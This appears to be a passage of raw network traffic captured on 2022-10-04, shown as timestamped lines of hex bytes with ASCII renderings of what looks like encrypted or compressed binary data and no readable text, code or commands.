                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28024INData Raw: 7d a1 77 51 37 aa 14 05 5f e9 ff be 19 87 bd 77 ef 34 d4 eb aa 9f b0 36 b7 74 93 db 05 ac ac c2 73 1b a9 68 a7 5c 52 0a 16 f3 e6 99 e4 0f c6 c4 c6 f1 dd 59 44 d8 87 74 69 93 cb 51 29 72 49 27 a3 68 4c 0f 56 60 24 bd 8d 37 cd e4 0a ed 44 29 96 1f b6 4b e5 82 18 91 98 c8 b3 a2 b2 f4 f0 cb 23 1d 6f 22 9f 87 5d b7 b4 84 88 2a b1 85 4d 9c 64 f3 31 fa 6d e4 bb d4 48 79 e8 72 b4 ae 71 74 46 f3 8d e1 30 81 18 b0 0f 64 15 08 5a 06 42 72 12 b1 ff 8b f3 a5 0c 12 f6 13 4f 8e de 31 ca 03 ca c3 b0 83 25 68 83 e1 e7 1a b6 2b f4 48 07 63 89 87 54 e6 af f1 c4 0b 23 ba 11 b6 6c ae 93 a4 c3 a1 a3 9a 89 cf 23 62 42 01 4a 33 aa 49 8c 3b 16 f5 bf ae bb 64 bf 79 cc b6 64 92 90 15 be ad d7 1d ea 3e 6b b7 e3 03 79 87 72 65 5c 3e 36 8e 75 a1 6f 15 28 1f d9 1c 4a 24 59 20 ac 54 91
                                                                                                                                                                                                                                    Data Ascii: }wQ7_w46tsh\RYDtiQ)rI'hLV`$7D)K#o"]*Md1mHyrqtF0dZBrO1%h+HcT#l#bBJ3I;dyd>kyre\>6uo(J$Y T
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28040INData Raw: e2 68 5d e5 fe 1e 7f fa fd c7 37 a5 4c b8 80 86 d8 7d c1 d7 f7 37 ec 04 12 4d 19 07 45 46 0b 58 32 03 7e 92 5f 03 2a ea f1 ca 52 f7 24 55 e4 9b e5 4b f8 a7 11 d0 39 ab 9e 72 d9 a8 4b 13 17 3e 00 33 81 8b 7e 89 89 af b5 4f 05 a8 bb ba 2e 6e 6c 01 c0 31 5e 5f b3 e1 96 cf 82 37 0d a8 af 75 d0 ed 63 57 87 1a 0f be 29 3a 12 34 ae bf f8 b8 c5 d9 32 70 25 f6 5d 2b df 4a 04 23 f6 dc 63 d7 64 20 87 b6 89 58 38 21 70 1d 13 47 72 af a2 67 5b 22 69 6e a2 43 41 a2 b6 bc 9c 09 33 d6 2a e7 77 ef c5 c7 7e 3a 20 d9 bf 92 03 c3 6a 61 f9 0b 28 5a 9f 6d 07 49 9e ef 00 71 f3 40 92 f6 de 43 3f f8 47 9b 35 f2 a3 df bd 7f 71 0b 55 a9 8c 85 b4 5c e4 92 d3 a8 20 f8 45 10 24 29 78 82 8b 19 07 9c 83 a2 92 9c 22 14 f7 52 38 ab 7a ee 7e 3d 66 03 85 c2 b8 62 bc 27 11 f8 d5 58 ff 43 fe
                                                                                                                                                                                                                                    Data Ascii: h]7L}7MEFX2~_*R$UK9rK>3~O.nl1^_7ucW):42p%]+J#cd X8!pGrg["inCA3*w~: ja(ZmIq@C?G5qU\ E$)x"R8z~=fb'XC
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28056INData Raw: 9d ce 99 0f 81 e3 2a 92 6b ce 8d 00 50 eb 2c b8 79 0e 45 bb 90 df 52 6d 6c 9d e4 b9 82 2b f3 35 d2 c5 ce ba 03 e1 04 ea 41 7c 04 bb 4b a7 1d 1d 30 9b 24 b6 32 4b 91 34 c4 d4 a9 6f a2 c0 56 57 b3 df 69 fd 30 56 18 4a 33 64 25 59 ce 11 b8 11 3e 06 e2 8f 3f 2a 52 db fc 19 e3 94 0c b9 03 37 b4 8b fc 87 af c4 e4 15 25 25 ee 40 2b 29 9b ca 52 cf 60 cf ea 89 a4 85 d6 ff 8f e7 79 3e 8f 1b a0 6f ee 9e fa b8 f0 18 b0 88 84 9e 9b e0 8b b6 06 db 39 12 76 4a 67 b0 b2 17 e6 32 45 3b 16 a9 db 7f f4 b7 1c d0 93 92 d0 f0 0e 56 0a 43 04 ad 7a 60 90 94 e7 2e 62 91 8b db 11 6f 45 28 c7 65 f5 ef f7 c3 20 ec 18 6f f3 bf c4 e5 6e 6f 64 89 35 77 c7 c9 c8 83 9d 47 aa a2 eb 85 37 4b 1a 81 50 f1 79 4c fd 10 bd 8d 7f b2 58 8f 8c cb 5b 6c ed e0 d4 4e fc d0 6b d8 df 32 52 67 e9 e3 aa
                                                                                                                                                                                                                                    Data Ascii: *kP,yERml+5A|K0$2K4oVWi0VJ3d%Y>?*R7%%@+)R`y>o9vJg2E;VCz`.boE(e onod5wG7KPyLX[lNk2Rg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28072INData Raw: 4f d3 73 c5 80 9b 0c 33 f6 6b 08 5f 21 af 0c c6 dd a7 b7 a1 0d 0b b8 e7 93 00 a4 2f 9b f5 22 44 ab 4d 7f e7 69 07 96 27 3d 81 d5 d0 d3 ee aa 66 a3 c9 89 6f 78 69 1f c1 53 09 05 3d 57 0c f6 f6 3f 27 90 11 4f ba c7 74 4a ab ea 2b f3 a1 e1 77 18 26 36 f9 8e 24 5d d9 7c e8 47 8d ca 7b 88 e5 c3 76 58 01 62 f5 56 eb f1 b8 e2 d3 97 88 02 fe 12 3a 6c b1 fc dc e0 72 19 83 bd cb 83 f3 20 a6 df 39 5d 30 75 4f 08 0d 45 a3 e4 9f a4 c4 67 40 0e dc 3b 9c 97 bf 6f af 89 5e c0 fe 60 c6 02 57 be 32 1a e8 e4 70 a3 b1 cf 05 36 5a 67 12 eb 48 a4 de 16 c0 1e 43 08 c3 73 9b 67 e9 30 e4 cc 9e e5 67 4a eb 54 03 4e df 79 a3 ef 56 07 93 79 a8 4c a2 e5 4c fb c3 f1 58 49 c6 32 1d 77 b9 ff 1d a9 f3 38 8f 16 7c f6 19 f3 5f 31 27 9c 37 43 a6 fc 6b 3d 7d c7 d7 da 99 e9 43 83 2d d9 11 d5
                                                                                                                                                                                                                                    Data Ascii: Os3k_!/"DMi'=foxiS=W?'OtJ+w&6$]|G{vXbV:lr 9]0uOEg@;o^`W2p6ZgHCsg0gJTNyVyLLXI2w8|_1'7Ck=}C-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28088INData Raw: e4 d3 13 0e 58 75 4e 08 28 64 b4 00 0e 08 2f 35 28 c5 3b da 9a d0 e7 b8 05 b6 a3 53 d8 ca 1a b8 e8 d2 e8 8c 3a 91 b2 e5 48 94 b0 e7 09 3c a3 f5 5c 2d ab c4 68 93 b6 3e 72 fa 0b 67 89 a8 4f 3e 74 c2 f2 92 2d 14 8e 9d ab 5f 32 67 bb a8 80 ff 58 f4 c5 f4 9d 59 ab 38 87 b2 3d b6 1f 53 86 17 1f 96 8a 42 9c b9 58 c5 0e 5c fa 73 38 d5 91 ad 7c 6c 8c 6d a2 0c 53 6f 29 0e 03 60 34 9a f5 ab d2 42 9c cf da b3 ad 91 c0 c6 06 7e 18 88 ec 6e 01 3f 06 99 9b 65 f2 7c 7e f5 06 bb 43 ea 2b b0 1c d4 74 8a 55 4e 25 8c d7 d4 5e 25 89 25 c5 95 68 54 f9 be f6 2e 48 db e8 a0 ae 07 35 64 5d e4 ea 81 68 9a 09 61 be 56 f3 d7 bb 9e ed 60 9b 13 4b 44 bf 03 04 5f 42 7c 6c ff a3 06 fd 4b 31 20 c0 41 17 ca 0a 86 40 54 c2 95 ff b1 f7 fb 35 63 a4 44 08 26 a2 27 56 0a 2d 60 9e c6 41 b7 7e
                                                                                                                                                                                                                                    Data Ascii: XuN(d/5(;S:H<\-h>rgO>t-_2gXY8=SBX\s8|lmSo)`4B~n?e|~C+tUN%^%%hT.H5d]haV`KD_B|lK1 A@T5cD&'V-`A~
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28104INData Raw: 5b 5c 39 40 50 d5 fa 3c 36 ec eb 8b 98 ba 71 60 89 87 d1 a5 b1 02 a4 77 49 a5 9b 6b 59 2d a5 e7 39 44 20 2e 0a 84 7f 55 db 2c f8 03 19 62 b3 25 ca d4 32 f3 93 b5 40 6b 29 0c 94 80 42 ac d5 7f 65 1b 5c 23 ee 6f 1e f5 7b 51 a6 94 5a 7e b1 23 40 74 09 7c 16 76 13 82 94 12 7d 5d 33 a7 3b e6 6f 42 ba c6 56 f2 a9 f5 02 20 77 bb ba eb 3d 7b 45 41 18 83 cd 63 4c 26 16 ea ef f8 01 c6 37 f4 75 b2 15 42 77 61 24 38 c8 1b 1c 2e 2a 0e 2d 0d 23 aa 5b 36 99 ec 1c 99 17 46 c2 21 51 83 74 48 48 e5 36 0e 2f 2b 6d 8f cd 85 30 dd cf e6 c2 19 89 80 9b 27 79 85 0f 52 6a e1 cf 47 68 85 7d 7f 7f 57 7f fe 80 5c 12 c5 aa b6 41 9b 29 ea 9d 44 48 da 6a cd bf 3b 43 91 28 45 54 40 9b c7 42 27 4c 42 5d 4d 47 75 ea d3 94 db df 44 e5 64 52 a3 e3 4d 00 21 f0 e6 44 18 9a 1b f8 6f 5a f9 c1
                                                                                                                                                                                                                                    Data Ascii: [\9@P<6q`wIkY-9D .U,b%2@k)Be\#o{QZ~#@t|v}]3;oBV w={EAcL&7uBwa$8.*-#[6F!QtHH6/+m0'yRjGh}W\A)DHj;C(ET@B'LB]MGuDdRM!DoZ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28120INData Raw: 0f ad ab 86 49 fd db aa a3 c5 a3 7d 94 80 bd 39 0d 30 d4 3c 84 ce bd 16 d0 8e ef ca 3f d1 dc 21 cc 6e e5 34 45 b5 d4 f5 de 39 16 77 ab f4 92 09 df 47 80 ab b9 20 59 5d c0 4b 7d 05 44 9b 06 c9 ff fe ae 62 c8 21 d0 e2 fd 25 c3 3a 21 94 ec 8b 5c 52 6f 65 9b 96 14 92 84 19 9d 54 ae 19 fd f6 60 26 ea ac e2 00 3a f5 e7 46 d6 2f 52 60 e1 0b 68 13 6c e2 74 ac 1d 8d 14 8b 6e 0b c0 f8 06 c9 f7 5d 8b 67 7b c3 51 fc 5c 68 d5 d2 82 ca 36 18 40 86 79 c7 06 5b 4a 49 ef a5 fe f0 6b 68 2f 37 12 7e c9 e2 8c 45 63 3b ae 91 b7 70 db 4e e3 80 0a d0 0f c0 4f 42 fd fa 54 3e 74 23 e3 65 5c 7e 8c 59 e2 7b 69 39 c5 fd f0 dd f1 1b 78 4c 28 e7 f5 98 93 74 c9 39 0a f7 6b 48 45 0a 0a 3d 60 7e 71 05 06 22 4b e2 fb fc de 2d 42 78 40 c0 67 54 fa 69 fc c1 56 c8 43 a0 5d 70 c5 6a 30 66 36
                                                                                                                                                                                                                                    Data Ascii: I}90<?!n4E9wG Y]K}Db!%:!\RoeT`&:F/R`hltn]g{Q\h6@y[JIkh/7~Ec;pNOBT>t#e\~Y{i9xL(t9kHE=`~q"K-Bx@gTiVC]pj0f6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28136INData Raw: c7 93 0b 96 46 d6 c0 16 50 71 a4 1c 7b 1c 14 c4 7b ec 80 60 f3 9e 20 36 b1 5c fb 1d 0a 04 15 5a 09 bc 8c 19 40 cd aa 8e 35 d4 fe 12 de e6 eb a0 36 99 df 3e 1c 50 3f 6d d3 b4 f9 cf 79 7d d8 e4 11 0f 72 e2 80 50 a1 ca 87 cb 30 84 4c 16 fa 58 49 d3 f6 32 67 44 91 21 ef fb eb 87 0e df ee ae 01 60 38 68 7b cf 5b 5d c6 ab 43 cd 3a 9d c2 2f b1 f9 c9 e7 8a a0 9e ce e5 cf 93 9d 00 6f 92 7c b5 d7 dc 43 3a 12 bb 3c 78 f2 02 b8 d4 c3 34 a3 e6 03 87 b7 58 81 3b 6c 9f 45 af cf 0e ee 66 65 52 f4 c6 a7 bc 21 fe 69 f0 6e 6a 91 d6 c3 3a 58 60 f5 db d7 87 23 5d 25 48 8a 0f d5 85 c2 3f 37 8a 66 f0 80 e9 f2 8f 01 61 d3 e7 66 3d c8 b1 12 79 2e 17 9c 17 a9 b8 70 0c 1a c5 4d ce 56 fc ab f6 c2 d5 b4 90 41 6c c0 fb 1e 31 a9 71 04 10 fb 73 aa 6b 64 69 1c f1 07 28 8a d4 71 9b 32 a5
                                                                                                                                                                                                                                    Data Ascii: FPq{{` 6\Z@56>P?my}rP0LXI2gD!`8h{[]C:/o|C:<x4X;lEfeR!inj:X`#]%H?7faf=y.pMVAl1qskdi(q2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28152INData Raw: 4a 3d 7e f3 20 ec a9 69 ed ad 9b 29 d0 4d c0 21 5e 58 8d 6f 55 76 dc eb 1b a7 20 1f 7d 3f 20 1c 94 0f 12 ca 78 96 04 be b9 ae 29 ac 53 51 32 ac 1e 9f 38 bb e6 37 a4 a5 16 7d ff 7f 56 35 e9 56 03 92 6d fc 1d bd 3c 66 19 90 48 17 cc 67 34 e0 73 21 76 85 a4 fb e1 84 83 2f 16 d8 1c a2 51 a9 f4 65 40 77 28 f1 56 98 90 ab 75 df d8 f8 f5 4f 80 ed 73 75 fb 70 4c 65 ea 7a 3c b8 44 5d dc 8d e0 5b ce 65 0a 0c f8 b4 f8 23 86 b0 6d 32 e1 a3 e1 a6 78 1c 39 8c 3e bd d9 0a 30 40 42 63 c2 fb 36 51 d6 96 75 b9 1b c5 f4 a1 31 46 31 f1 60 eb e3 0b b1 88 b0 a3 fc 90 15 21 cc cf 8d 13 35 91 6a 0b 92 3c 43 83 1c 27 8f 42 47 19 8e db 01 ab 02 cc 1b 6b d1 9f d9 d6 5a 6d 3c 4f 92 0c 3f 45 72 f5 a0 66 25 ee d5 c6 eb 88 0c c0 09 38 c5 69 e0 f5 22 17 d8 dc 40 32 06 ec 39 d1 0a 9a 76
                                                                                                                                                                                                                                    Data Ascii: J=~ i)M!^XoUv }? x)SQ287}V5Vm<fHg4s!v/Qe@w(VuOsupLez<D][e#m2x9>0@Bc6Qu1F1`!5j<C'BGkZm<O?Erf%8i"@29v
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28168INData Raw: 93 1b d6 84 f4 2b d4 88 05 85 72 c0 ab c2 21 fc cf 85 35 4f 8c 58 71 9c 58 ae fa a3 87 68 13 2c 37 a4 a2 08 07 7b 42 3d f7 b2 02 89 39 99 bc 14 0d 23 d9 23 0f 52 8f 95 dd d2 49 da 6e b4 7e 3c 88 8e fa 96 bb 7d b8 ed af b4 67 89 82 01 7a ed 2c 48 c1 28 75 03 b2 27 45 32 5f df 7c 4a 20 cf ec e0 09 da 30 85 ee af 94 37 84 0e 40 03 c2 2d d4 3e 1b 25 01 5e f9 01 bd 50 93 51 bc 1f e9 d0 b4 13 ee 24 a4 d0 0c f5 14 d5 e9 43 8d 83 c9 56 e8 9c 7e 8b 55 50 bd 3a 04 a2 97 1c 8f f4 b8 30 cd df 12 9e 6f 48 87 3f b8 58 c8 68 b3 48 63 49 40 19 77 58 f6 28 a7 b4 69 29 93 90 79 95 32 ee f9 c2 8c b5 64 c2 49 ae 36 bc 9e 99 92 cc 6f 99 eb a8 32 b2 70 38 3d ba e7 4a 34 31 1c 44 34 40 fc 1c a5 a2 57 a1 46 fd cd 41 05 8a 98 d9 5d c6 ff 05 96 c9 2b 23 36 af 27 bd c6 9a 14 19 13
                                                                                                                                                                                                                                    Data Ascii: +r!5OXqXh,7{B=9##RIn~<}gz,H(u'E2_|J 07@->%^PQ$CV~UP:0oH?XhHcI@wX(i)y2dI6o2p8=J41D4@WFA]+#6'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28184INData Raw: c0 e0 70 da 04 39 da ac 68 4f 28 2f d3 e8 b1 07 64 da ee 5e e7 de 81 ab d9 a3 67 e2 06 d3 c4 93 65 8e 02 0d 6d 7e 22 15 ac aa 1a 2c 7f fd f9 29 24 8c 5f ef f7 a7 d7 53 68 84 ae 2f 80 d8 72 b2 7c 7d 0e 7f 24 0d 91 bb c4 92 8a a6 f1 c5 cf d2 16 85 37 45 3a 6a e2 4b 25 63 7d 62 33 82 3b 0c 08 c7 df 90 21 b5 5d b4 16 42 17 ac 45 b9 58 0b 1a fb e0 20 2d b5 a6 e4 ac a5 44 82 ac 13 5e 88 37 59 3e a4 38 44 f4 e2 5d 84 23 28 f3 2d 12 68 81 c5 07 07 92 fc 68 7d 22 1e a5 5e 5e 04 fb 7a c0 38 04 ee 92 a7 fe 7f 8f 8e 4e e1 d9 f7 15 05 8a 7f 78 44 d8 0b 07 f5 77 ae 28 f5 bb d6 05 ca 65 7d 87 28 bb 0d 38 a7 f8 d8 a5 77 b0 47 ec 43 a9 7f 69 16 84 45 85 e9 81 a5 25 76 ae 2c a1 74 2d be 54 81 44 f1 3b d4 f3 4b eb d3 91 4c 23 7b b7 17 21 5b 56 fc 3f e1 08 77 34 39 05 69 e2
                                                                                                                                                                                                                                    Data Ascii: p9hO(/d^gem~",)$_Sh/r|}$7E:jK%c}b3;!]BEX -D^7Y>8D]#(-hh}"^^z8NxDw(e}(8wGCiE%v,t-TD;KL#{![V?w49i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28200INData Raw: b6 9b a3 ec 74 ad 55 2c 53 c3 09 5d 04 2c 51 1f b8 04 f5 2c e1 e0 8a d7 13 14 a3 ce d9 fa f1 f4 35 04 7a 51 56 1a c6 df 13 fa 41 a9 d4 e7 fc 0b b8 a3 22 86 9a 6c 6e 13 ef 5f 64 fd 27 c2 f1 60 de a7 da 4e 77 bb ea 44 4a c8 38 16 17 9f 23 df 74 ee 18 00 6c 34 3e 01 41 23 88 13 c3 e6 ec 24 c3 87 12 36 4b 57 4c e7 1c ab 2e 19 7a 7d b6 14 b8 5a 4b 17 63 61 79 5d da ec 23 17 4c b9 8d 0b 9a 85 d7 9d ee 2e 67 f7 10 df 4b 45 1d e2 a4 01 e2 4c 11 32 ca 52 09 90 94 16 77 6b 51 c5 42 9c 55 3c 32 dc 7d d2 67 b0 35 66 de e7 f9 33 b5 28 8b d7 2d 0d c5 de 6e 89 d6 35 59 bc aa e6 66 5c 25 99 ca 6e ed 53 b8 cf 29 73 9a 4e b8 a0 a7 6c 94 ed c2 5e 15 e8 bc 8a 60 7b 9e 7c c0 a5 de d7 fc ae 76 08 3d cb bd 82 5a ba 1b df f0 10 08 e0 15 69 a6 fe dc 6d d3 28 55 73 dd d2 11 32 eb
                                                                                                                                                                                                                                    Data Ascii: tU,S],Q,5zQVA"ln_d'`NwDJ8#tl4>A#$6KWL.z}ZKcay]#L.gKEL2RwkQBU<2}g5f3(-n5Yf\%nS)sNl^`{|v=Zim(Us2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28216INData Raw: 1a 49 e1 af 3a 55 2c 22 34 73 8f bc 2d 54 41 d5 17 dc 11 48 ec f0 68 23 cc f4 91 ef b8 47 a9 bc 1b b7 bc ae 93 5d 87 85 f8 fc a1 8d 68 3a 06 e3 16 39 a1 80 45 0c 27 62 8c 37 c5 c3 d9 67 04 25 80 33 21 dc 8e c7 6d c0 e4 e3 42 96 53 50 92 cb fe 56 fd 2c 40 b6 95 a3 1d 4e 27 23 60 04 bd 5a 78 cc 00 2f 95 72 85 b8 e3 76 54 8e 51 61 4e c3 8a d8 ee ce 87 1e 58 d9 a1 99 43 62 94 9f 20 80 d1 ff 4c c9 39 d3 b8 27 73 26 19 7b 34 60 75 ef 76 89 08 29 f6 4c 21 24 d6 f5 ff 6d 72 59 63 bb aa ee 21 2e f5 59 c0 7d 2c 31 58 df 69 f8 09 07 05 db a7 f8 59 d5 60 3c 2b 5e 57 3a 10 59 5e 0e 05 30 43 b7 04 c3 b8 77 5a d5 18 3c ee 56 61 f6 02 99 88 03 8b 79 bd a5 ad 98 57 36 84 d0 66 ae 3d e6 fb 86 df e1 95 d3 ad d7 04 5e a6 99 28 6f 7e b6 4a 77 7a 33 fa b7 87 b9 f2 96 04 8e 5f
                                                                                                                                                                                                                                    Data Ascii: I:U,"4s-TAHh#G]h:9E'b7g%3!mBSPV,@N'#`Zx/rvTQaNXCb L9's&{4`uv)L!$mrYc!.Y},1XiY`<+^W:Y^0CwZ<VayW6f=^(o~Jwz3_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28232INData Raw: c5 48 f5 61 7a 30 8d 3d 28 8d bd a0 03 8e d2 9b 99 78 e8 f0 11 50 33 d8 fd 32 8f e5 ab ed 89 47 70 15 8f 77 d4 d8 92 76 53 b9 4f 6d ef 39 fb fc 6e 67 a8 bb 65 52 dc 5f a0 cb fd 3d da fb b4 2d be 95 dc 2c 39 e1 fc ab d9 a6 ed f4 30 b5 a9 2e c7 d7 e8 9b 69 01 b5 5d 41 c6 a7 b6 b0 f2 04 45 1d d7 88 bf 72 eb 09 d3 68 1f 2f c7 c1 45 f1 d6 c8 57 ce 08 f4 1e e9 87 ad 8b 94 6e da 75 49 8c e4 29 5d 6b 27 ea 66 5f 36 e8 13 8f 75 2d e0 5d cd 14 fe 47 c8 1d 13 34 6d 31 a3 fa 36 3d 6a bc fc b3 09 8f 77 2c 8c f3 46 15 4b 3e b4 c5 af 03 a9 a8 1a 4b b7 da 39 f1 a0 b4 3c f0 7a 4f 6e 93 b1 97 4c ad e7 18 1b 74 b5 88 27 d8 18 54 43 e2 8a 6a b1 08 6e 38 04 22 73 73 06 39 0a 3c a6 dd 11 45 6e 61 38 49 9b 76 f1 04 2c 2a fd a0 69 00 8e d3 1b a7 ce 1e 25 a4 41 50 cd 31 54 76 4a
                                                                                                                                                                                                                                    Data Ascii: Haz0=(xP32GpwvSOm9ngeR_=-,90.i]AErh/EWnuI)]k'f_6u-]G4m16=jw,FK>K9<zOnLt'TCjn8"ss9<Ena8Iv,*i%AP1TvJ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28248INData Raw: cb 17 0a 05 3d 13 c5 7a 1d 26 b6 8c 0b bd 5a 38 1c 46 bb eb c0 b0 30 ea bc 6c 04 70 5d 2d 86 39 1e c8 3c 2d d8 28 b8 8d e6 36 1d b0 3f ee 3d 28 c0 98 bd ec 48 3b e2 1d df e3 a8 19 82 ac 57 2b ee a9 b8 1b e1 d9 37 d5 85 2f 5d 52 50 46 f2 e3 7f 1b 4d 41 6e 1f dd 9d 09 98 57 19 ff 10 0c 9d 5a f6 6a f2 18 57 27 ca ab 9e 40 cc 49 ba 66 77 9f 91 22 df 4a 45 fa 52 de 49 be d8 63 b8 fe 14 c3 70 5c 89 85 a0 cf 63 ec ae b0 7e 14 d6 3c fd e9 2f 68 a1 66 52 78 2a cb 28 25 08 f1 59 84 da b4 a4 73 3d ee 15 84 5b 68 aa c4 9b 10 ba c8 e2 ca 10 75 d7 d6 74 93 17 5e a6 2c 3a d0 94 ba 3b cd a9 3e cf d6 38 f9 07 b7 0f aa e2 76 d7 64 76 25 ee 8d cc 0d 30 ca f9 8c a3 09 cf c1 ef 5f d9 f5 1b 47 96 a7 fa f3 5a 1a 92 b9 75 df d5 77 9b ec 29 48 74 5f 0f c0 0b 38 6c 64 9c 19 db 0c
                                                                                                                                                                                                                                    Data Ascii: =z&Z8F0lp]-9<-(6?=(H;W+7/]RPFMAnWZjW'@Ifw"JERIcp\c~</hfRx*(%Ys=[hut^,:;>8vdv%0_GZuw)Ht_8ld
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28264INData Raw: f7 9a 42 c2 47 99 28 6a 63 25 98 a2 69 31 b2 d4 67 d1 af 2b b1 fc b3 2e cb 74 79 58 23 64 ec 74 3f 0f 32 bd 4e 6d 18 07 79 39 bd 14 1f 58 78 9e 6c 64 03 2d 25 12 67 ea 7d 16 d7 69 62 d8 7d b4 d7 61 79 49 2f 8d 91 4b e8 b7 f5 36 81 02 b7 df 07 e7 11 14 c3 66 e1 c5 d9 f8 e5 3d 4c 71 44 d5 e9 a9 5c 8d 00 f2 38 6d f4 88 8b 44 d3 0f 57 1c 16 40 ca 71 d4 9d ef ff b3 b6 c8 ec e4 d8 fa 72 1c e4 33 78 bf ed fa 3b da 93 6f 8b 8f b1 24 c0 64 ae 36 e6 78 57 97 29 44 c3 58 b8 5b b1 eb 1b d7 db 60 7c 53 e9 64 e6 cd 8f 60 ec 0f 2f 89 10 b0 92 6c 97 90 d6 ab 00 da 01 55 90 9d 67 59 60 64 95 34 1c 72 c8 fb 02 47 1d c0 0c 4e c0 ec 17 0e e4 a2 64 0d d5 57 c1 1a 70 ca 0f a6 37 2e 7a 2c 9d 96 35 a3 29 3a 4b 11 af f0 54 95 89 c8 82 da 04 4d 3d 2f 1d 5a b0 80 30 ac a6 e0 c3 98
                                                                                                                                                                                                                                    Data Ascii: BG(jc%i1g+.tyX#dt?2Nmy9Xxld-%g}ib}ayI/K6f=LqD\8mDW@qr3x;o$d6xW)DX[`|Sd`/lUgY`d4rGNdWp7.z,5):KTM=/Z0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28280INData Raw: cd fe a4 bb 71 32 13 10 d4 35 b0 e9 30 18 dc 45 da 6a e0 e9 0a 59 1d 36 d9 72 6c 82 e9 c6 2b 0e 12 fd 6f 19 60 de c9 38 99 35 fa f8 e6 5a 1c 3e c9 52 4a 0a 02 70 22 58 8a f7 0d 2b 03 5b 74 93 31 c7 fd f3 9f ee 00 f8 c9 8f 89 88 27 a0 b6 e3 be 66 b1 d8 f9 0e 9f f7 01 56 f6 68 0d 49 8a 8b bb 5e 37 14 af ce bc b8 32 3c b1 7a 6c a0 9b c6 c8 3b b4 0b db 2a 65 8e 03 b4 8b 6a ac 91 7b 64 2c 15 86 1f 8d 86 80 58 6a 75 3d 4a d3 c2 9d 25 fb 50 01 1d 10 2c 86 99 68 99 d7 ca 46 44 e0 d0 36 f7 e5 a1 eb 0f 50 70 1b e0 b2 43 39 2c f5 dd 6e 08 e7 a0 5b cc 07 a9 c9 1c 3d b0 9e 38 3a 89 e4 62 e5 2e a8 3c 8f 65 08 f1 59 2d 80 ce 8e 26 d6 5a ad a7 12 11 f8 15 1b 86 66 bc 53 af b8 d0 19 56 6e 85 f0 17 46 9c e7 db 08 1f 45 d4 57 49 57 c7 72 57 1a ee 32 5f 83 28 a4 f2 90 31 8b
                                                                                                                                                                                                                                    Data Ascii: q250EjY6rl+o`85Z>RJp"X+[t1'fVhI^72<zl;*ej{d,Xju=J%P,hFD6PpC9,n[=8:b.<eY-&ZfSVnFEWIWrW2_(1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28296INData Raw: 30 45 fc 1d 4b 44 5d a6 45 25 24 df 40 7a 40 9b 83 32 32 0a c4 e5 bc 45 99 6d 64 4b 9b 42 0b d4 6c 47 63 39 f3 56 3d 58 50 e8 5b da 41 cc 2a 05 04 ce 47 fc 8f 8d 5b 11 0c 3c 14 d0 9a c8 ca 98 01 59 5c 50 04 80 20 41 75 5d 00 13 a9 cd cf e8 b1 8b 36 4e c6 ad 2d 9c ba 8f da 9f 17 04 c4 46 f8 95 3a 84 41 97 f8 a1 ac e9 63 2b 06 a2 7f ff 1e 8b 85 85 3e c3 a5 5f fd 0d fb ea 46 e6 64 be 5c 6b 28 5f 5d f7 83 41 c1 91 a3 f0 2f 42 b9 f3 56 75 ee 94 d1 ec 2c 95 21 2f 55 54 1e b5 c4 0e 22 c2 ce 8c a0 fb 99 88 93 a3 9c 18 47 a6 ea 78 95 1c a5 df e3 de 1b 44 c0 e7 0d aa bc 0d 81 de 11 7d af b3 3d 98 46 eb 94 b1 54 97 ff e9 1a 31 d7 f9 d5 22 a5 9e 60 c7 53 e0 d5 24 85 22 9a 9d 56 a7 d5 5c 30 33 81 17 59 3c 7b 3c 89 a6 40 fb 45 28 c1 59 b5 b4 ab 77 25 9d bb 48 7d 1c e9
                                                                                                                                                                                                                                    Data Ascii: 0EKD]E%$@z@22EmdKBlGc9V=XP[A*G[<Y\P Au]6N-F:Ac+>_Fd\k(_]A/BVu,!/UT"GxD}=FT1"`S$"V\03Y<{<@E(Yw%H}
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28312INData Raw: 19 b3 cc cc a1 68 e4 72 e4 59 8e e1 f0 16 35 c8 57 fa b7 aa 1e a7 76 f9 b3 03 84 5f da 61 5a 49 ec 83 1d 10 39 f4 17 b3 5c eb b0 9e 7e 53 d3 55 ab c3 e7 b3 c1 53 8e 3a 8c 94 b5 ad e3 52 e4 dd 5b 6d 83 8d 9d 3b be 2e d6 64 20 0f 78 89 de f8 9e 72 b5 2c 7c e3 d1 b4 ce 1d 61 41 2b 65 9c 8f cc cc 08 62 8c 09 3a 9a 06 ce 8d 05 55 65 79 dd e5 57 2c 75 3f f4 81 f5 80 4c 48 bc fd de 59 78 a1 f9 80 0b 48 3b ec 37 9c 88 42 67 0e 00 ec 1e a1 c5 72 c6 60 5b 2d 37 a1 49 37 c9 dc 4d e8 8e cb 3e e2 2b 78 48 e3 6c 55 0a bc 93 e5 3b 79 3b de a3 52 19 6c c5 86 e7 cb 3e 10 b7 a4 ba 64 fe 3b d5 4c a9 3a 95 3b a3 9d f9 05 18 78 31 70 f5 af ec a2 6b f3 9d 73 e1 0e fe f2 dd ab d3 c4 e5 c0 5d 84 24 7c 83 bd f5 c7 49 1f 30 46 8a 5a 03 f8 70 b8 21 65 d1 2b 06 6e 00 d9 63 87 c2 f8
                                                                                                                                                                                                                                    Data Ascii: hrY5Wv_aZI9\~SUS:R[m;.d xr,|aA+eb:UeyW,u?LHYxH;7Bgr`[-7I7M>+xHlU;y;Rl>d;L:;x1pks]$|I0FZp!e+nc
